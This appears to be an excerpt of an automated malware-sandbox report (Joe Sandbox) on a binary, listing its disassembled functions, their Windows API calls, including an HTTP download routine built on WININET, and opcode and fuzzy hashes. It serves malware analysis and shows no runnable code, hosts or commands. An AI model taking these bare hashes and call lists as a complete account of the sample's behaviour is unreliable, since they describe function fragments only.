Opcode ID: fe315758f6ae813d555d4648699a32d3f9295b98f1cf4abd9df7a61f3f98b26a
Instruction ID: 64f5a414fdeb2722b621ce82423e4877da61eb35825db30da713d29d0a1182f8
Opcode Fuzzy Hash: fe315758f6ae813d555d4648699a32d3f9295b98f1cf4abd9df7a61f3f98b26a
Instruction Fuzzy Hash: F611E535A40218EBDB54EBA0EC4AFEE377EAF04710F244159F605A61E1EB709A84CB65

Function 005FBD82 Relevance: 13.8, APIs: 9, Instructions: 341networkfileCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(00648D20,00000000,00000000,00000000,00000000), ref: 005FBDBC
InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 005FBDE0
HttpOpenRequestA.WININET(?,00000000), ref: 005FBE2A
HttpSendRequestA.WININET(?,00000000), ref: 005FBEEA
InternetReadFile.WININET(?,?,000003FF,?), ref: 005FBF9C
InternetReadFile.WININET(?,00000000,000003FF,?), ref: 005FC050
InternetCloseHandle.WININET(?), ref: 005FC077
InternetCloseHandle.WININET(?), ref: 005FC07F
InternetCloseHandle.WININET(?), ref: 005FC087

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSend
String ID:
API String ID: 1354133546-0
Opcode ID: 0e8b5ba2c8dad282689331c50d8b60b87e1c5388e3c99e989b377891b7ff1b5b
Instruction ID: 7cf2625a5e980a3458ebf38fde84fe37e53b1eda09e8fb8de683e548d36f1e39
Opcode Fuzzy Hash: 0e8b5ba2c8dad282689331c50d8b60b87e1c5388e3c99e989b377891b7ff1b5b
Instruction Fuzzy Hash: 38C1A17160011C9BEB19DF24CD88BAE7F66FF45304F5082A8FA0997292DB759AC0CF94

Function 00635572 Relevance: 13.8, APIs: 9, Instructions: 301COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f1daf13687eca71d34320efabf581e9431d606941cc6409c95e7000a9e15b5b
Instruction ID: c99c2217555cbd04fea723b3f9394dee4c0358e2afa6703ad1521962d3bd8720
Opcode Fuzzy Hash: 7f1daf13687eca71d34320efabf581e9431d606941cc6409c95e7000a9e15b5b
Instruction Fuzzy Hash: A8C1F070E04B59AFDB11DF98E885BADBBB3AF09310F144059E502AB392C7709941CFA5

Function 0061E939 Relevance: 13.6, APIs: 9, Instructions: 148windowCOMMON

Download Yara Rule

APIs

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0061E989

Part of subcall function 00618E3F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00618E60

Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 0061E9A2
Concurrency::location::_Assign.LIBCMT ref: 0061E9B8
Concurrency::details::ReferenceCountedQuickBitSet::InterlockedSet.LIBCONCRT ref: 0061EA25
Concurrency::details::SchedulerBase::ClearQuickCacheSlot.LIBCMT ref: 0061EA2D
Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 0061EA54
Concurrency::details::VirtualProcessor::EnsureAllTasksVisible.LIBCONCRT ref: 0061EA60
Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 0061EAB7
Concurrency::details::ReferenceCountedQuickBitSet::InterlockedClear.LIBCONCRT ref: 0061EAEC

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Context$Base::$Processor::QuickVirtual$ClearCountedEventInterlockedReferenceSet::$AssignAvailableBlockedCacheConcurrency::location::_DeactivateEnsureInternalMakeSchedulerSlotSpinTasksThrowTraceUntilVisible
String ID:
API String ID: 1448206229-0
Opcode ID: b8484f8dfab6b0494d78344b7645c85a390582f31faab4a81bd4080df27c1793
Instruction ID: 120931b9e6f88b4f71114abed215ed544ec3d847b74f4e9f1408c38c0b852bb0
Opcode Fuzzy Hash: b8484f8dfab6b0494d78344b7645c85a390582f31faab4a81bd4080df27c1793
Instruction Fuzzy Hash: FA518B347002148FDB04EB28C495BED77A7BF89310F1D44A9ED469B386CB75ED818BA1

Function 006177F1 Relevance: 13.6, APIs: 9, Instructions: 106timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00617813

Part of subcall function 00615BC8: __EH_prolog3_catch.LIBCMT ref: 00615BCF
Part of subcall function 00615BC8: Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00615C08

Concurrency::details::SchedulerBase::NotifyThrottledContext.LIBCONCRT ref: 00617821

Part of subcall function 0061682D: Concurrency::details::SchedulerBase::FoundAvailableVirtualProcessor.LIBCONCRT ref: 00616852
Part of subcall function 0061682D: Concurrency::details::VirtualProcessor::ClaimTicket::ExerciseWith.LIBCMT ref: 00616875

Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 0061783A
Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00617846

Part of subcall function 00615BC8: RtlInterlockedPopEntrySList.NTDLL(?), ref: 00615C51
Part of subcall function 00615BC8: Concurrency::details::SchedulerBase::AddContext.LIBCONCRT ref: 00615C80
Part of subcall function 00615BC8: Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 00615C8E

Concurrency::details::SchedulerBase::GetNextSchedulingRing.LIBCMT ref: 00617892
Concurrency::location::_Assign.LIBCMT ref: 006178B3
Concurrency::details::SchedulerBase::StartupVirtualProcessor.LIBCONCRT ref: 006178BB
Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 006178CD
Concurrency::details::SchedulerBase::ChangeThrottlingTimer.LIBCONCRT ref: 006178FD

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::$Scheduler$Context$Throttling$InternalTimeVirtual$Processor$AssignAvailableBlockedChangeClaimConcurrency::location::_EntryExerciseFoundH_prolog3_catchInterlockedListNextNotifyProcessor::RingSchedulingSpinStartupThrottledTicket::TimerUntilWith
String ID:
API String ID: 2678502038-0
Opcode ID: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
Instruction ID: 13fcf6279a7289fe82d165792a0afee3334db8f256fc7669f1ed0529eb650d6b
Opcode Fuzzy Hash: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
Instruction Fuzzy Hash: 4531D430B08255AACF96AA7844966FEBBBB5F41300F0C45B9E456D7382DB254DCAC391

Function 00620895 Relevance: 13.6, APIs: 9, Instructions: 69threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 006208AB
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,00615BBE,?), ref: 006208BD
GetCurrentThread.KERNEL32 ref: 006208C5
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,00615BBE,?), ref: 006208CD
DuplicateHandle.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000002,?,?,?,?,?,?,00615BBE,?), ref: 006208E6
Concurrency::details::RegisterAsyncWaitAndLoadLibrary.LIBCONCRT ref: 00620907

Part of subcall function 00610121: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 0061013B

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00615BBE,?), ref: 00620919
GetLastError.KERNEL32(?,?,?,?,?,00615BBE,?), ref: 00620944
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0062095A

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Current$Concurrency::details::ErrorLastLibraryLoadProcessThread$AsyncConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateHandleReferenceRegisterWait
String ID:
API String ID: 1293880212-0
Opcode ID: 659b6b1c342b38b67f2c539517d99f658837af8412e534bd1ca432c06d157851
Instruction ID: 148b07f90dc85de1bf19447fa6c6114b6664bf527656d27de85087da2417e72f
Opcode Fuzzy Hash: 659b6b1c342b38b67f2c539517d99f658837af8412e534bd1ca432c06d157851
Instruction Fuzzy Hash: 1611D875900325ABFB50ABB4AC4ABDB3B6A9F06700F041035FA4AD6293E6748540CF75

Function 00624750 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00624787
___except_validate_context_record.LIBVCRUNTIME ref: 0062478F
_ValidateLocalCookies.LIBCMT ref: 00624818
__IsNonwritableInCurrentImage.LIBCMT ref: 00624843
_ValidateLocalCookies.LIBCMT ref: 00624898

Strings

`8b, xrefs: 00624835, 0062483E, 0062484F
csm, xrefs: 0062482D

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: `8b$csm
API String ID: 1170836740-2211812971
Opcode ID: 1cf20bc6b83b77bb01535e23dde8862257efc4822835012040ee0f953394c463
Instruction ID: b63624f263c42bc0f17044a179902374852afe7877b31052ad2b584f9c2e6c16
Opcode Fuzzy Hash: 1cf20bc6b83b77bb01535e23dde8862257efc4822835012040ee0f953394c463
Instruction Fuzzy Hash: 2341E534A00A699BCF10DF68E880ADE7BB3FF46324F148059E9195B392DB35DA01CF90

Function 0062E92E Relevance: 12.2, APIs: 8, Instructions: 203COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 0062E958
_free.LIBCMT ref: 0062EA31
_free.LIBCMT ref: 0062EA5E

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: _free$___from_strstr_to_strchr
String ID:
API String ID: 3409252457-0
Opcode ID: fd800ab3c0522cc88c03547a86afe5a5f4559a5dcf249827cf4b25a108d12141
Instruction ID: 95e427f51b4565cb8c41aaf2ab2c2e2b14dabab46d817d97c7b5c78c8f16d3b2
Opcode Fuzzy Hash: fd800ab3c0522cc88c03547a86afe5a5f4559a5dcf249827cf4b25a108d12141
Instruction Fuzzy Hash: 32514C71E04B256FDB20AFB4F942AAD7BA7AF00311F04807EE5169B381EA728941CF55

Function 00621A36 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 104threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00621A4F

Part of subcall function 00621D1E: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,00621797), ref: 00621D2E

Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 00621A64
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00621A73
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00621B37

Strings

switchState, xrefs: 00621A6B
pContext, xrefs: 00621B2F

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Concurrency::details::std::invalid_argument::invalid_argument$ExecutionFreeIdleObjectProcessorProxy::ResetRoot::SingleSuspendThreadVirtualWait
String ID: pContext$switchState
API String ID: 1312548968-2660820399
Opcode ID: db18df366fe9d46a1bd5d4ff6949dc31b0116e7263c93f72561ba82aab1cb013
Instruction ID: a8d396f108505def637bc239086d6262a1f2ab4ee9f75363b0f0418d729b1125
Opcode Fuzzy Hash: db18df366fe9d46a1bd5d4ff6949dc31b0116e7263c93f72561ba82aab1cb013
Instruction Fuzzy Hash: 9F31C535A04625ABCF05EF68D881EAE737BBF55310F204469E911AF381EB70DE068F90

Function 0061E6BF Relevance: 10.6, APIs: 7, Instructions: 102COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 0061E6E7

Part of subcall function 0061E454: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 0061E487
Part of subcall function 0061E454: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 0061E4A9

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0061E764
Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 0061E770
Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 0061E77F
Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0061E789
Concurrency::location::_Assign.LIBCMT ref: 0061E7BD
Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0061E7C5

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::$Context$Virtual$DeactivateGroupInternalProcessorProcessor::ScheduleSchedulerSegment$ActiveAssignCommitConcurrency::location::_EventPointsReclaimReleaseRunnableSafeTraceTrigger
String ID:
API String ID: 1924466884-0
Opcode ID: de8d10dadf3a05e7f9246681c73796045854a8fc2c42ab64bb98c005cf29435c
Instruction ID: 84ff5ad7e7ef3918e4cee4ef6a421497aa5fa3bd21fc5b38070ef3368db30de2
Opcode Fuzzy Hash: de8d10dadf3a05e7f9246681c73796045854a8fc2c42ab64bb98c005cf29435c
Instruction Fuzzy Hash: E5412975A002159FDF05EF64C494AEDB7B6FF48300F1880AAED499B382DB34AA41CF91

Function 0062EF7B Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0062EF43: _free.LIBCMT ref: 0062EF68

_free.LIBCMT ref: 0062EFC9

Part of subcall function 0062AC95: HeapFree.KERNEL32(00000000,00000000,?,0062EF6D,?,00000000,?,?,?,0062EF94,?,00000007,?,?,0062F396,?), ref: 0062ACAB
Part of subcall function 0062AC95: GetLastError.KERNEL32(?,?,0062EF6D,?,00000000,?,?,?,0062EF94,?,00000007,?,?,0062F396,?,?), ref: 0062ACBD

_free.LIBCMT ref: 0062EFD4
_free.LIBCMT ref: 0062EFDF
_free.LIBCMT ref: 0062F033
_free.LIBCMT ref: 0062F03E
_free.LIBCMT ref: 0062F049
_free.LIBCMT ref: 0062F054

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: f2c9cbcbdea25c70db4e9b8930aae965ae4a61b9cabad425459c8f385a1b4d78
Instruction ID: caea9722e238a20b7bc7724ed3f60d64d12fedbe077a31e0151b3920581910f2
Opcode Fuzzy Hash: f2c9cbcbdea25c70db4e9b8930aae965ae4a61b9cabad425459c8f385a1b4d78
Instruction Fuzzy Hash: AC119071501F28ABDAA1B7B0EF07FCBB7DE5F00300F44482EB39A6A052D666A6044E45

Function 00606C40 Relevance: 9.3, APIs: 6, Instructions: 336COMMON

Download Yara Rule

APIs

Part of subcall function 0060C5AF: mtx_do_lock.LIBCPMT ref: 0060C5B7

__Mtx_unlock.LIBCPMT ref: 00606D11
std::_Rethrow_future_exception.LIBCPMT ref: 00606D62
std::_Rethrow_future_exception.LIBCPMT ref: 00606D72
__Mtx_unlock.LIBCPMT ref: 00606E15
__Mtx_unlock.LIBCPMT ref: 00606F1B
__Mtx_unlock.LIBCPMT ref: 00606F56

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Rethrow_future_exceptionstd::_$mtx_do_lock
String ID:
API String ID: 95294986-0
Opcode ID: e6fc1b5905ad87565a06e945ce563a60887de4a8667a2befd20ce82b30c3781a
Instruction ID: 619ca531d90f6fd31bff6db6bdd21d527f5dbe8d65fd6b6b9c32c5836ab5e3ed
Opcode Fuzzy Hash: e6fc1b5905ad87565a06e945ce563a60887de4a8667a2befd20ce82b30c3781a
Instruction Fuzzy Hash: 0DC1FF70A403099FDB28DFA4D845BABBBF6AF05314F00456EF416977C2EB31A914CBA1

Function 0062FB5F Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,005F86B0,00000000), ref: 0062FBA7
__fassign.LIBCMT ref: 0062FD86
__fassign.LIBCMT ref: 0062FDA3
WriteFile.KERNEL32(?,005F86B0,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0062FDEB
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0062FE2B
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0062FED7

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: cf40a701d0435ae942e1882db8918a34d687f948a5bd646c350e25b729a2c36a
Instruction ID: 15b1197b55e74cb93b0708bb9ef2894f949f3b6324bb179e8d00f9734a1d6420
Opcode Fuzzy Hash: cf40a701d0435ae942e1882db8918a34d687f948a5bd646c350e25b729a2c36a
Instruction Fuzzy Hash: A9D19E75D006689FCB15CFA8E8809EDBBB6BF48314F284179E855BB352D730A946CF50

Function 0061E7ED Relevance: 9.1, APIs: 6, Instructions: 117COMMON

Download Yara Rule

APIs

Concurrency::location::_Assign.LIBCMT ref: 0061E82E
Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0061E836
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0061E860
Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 0061E869
Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 0061E8EC
Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 0061E8F4

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Context$Base::$GroupInternalScheduleSegment$AssignAvailableConcurrency::location::_DeferredEventMakeProcessor::ReleaseRunnableSchedulerTraceVirtual
String ID:
API String ID: 3929269971-0
Opcode ID: 6bd8f864729381c2ad499d4aed9dd92cf7ba86d33af83e48afd83fc463fbc262
Instruction ID: 2230070a6b70ae9310b591cda8070ea056b10f8f196a0aeeae429e2c1da3da05
Opcode Fuzzy Hash: 6bd8f864729381c2ad499d4aed9dd92cf7ba86d33af83e48afd83fc463fbc262
Instruction Fuzzy Hash: 76414D75B00519AFCB09DF64C454AADB7B6FF89310F188159E906A7390CB75EE41CF81

Function 0060EBF6 Relevance: 9.1, APIs: 6, Instructions: 101COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0060EBFD
Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 0060EC27

Part of subcall function 0060F2ED: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 0060F30A

__alloca_probe_16.LIBCMT ref: 0060EC63
Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 0060ECA4
Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0060ECD6
__freea.LIBCMT ref: 0060ECFC

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
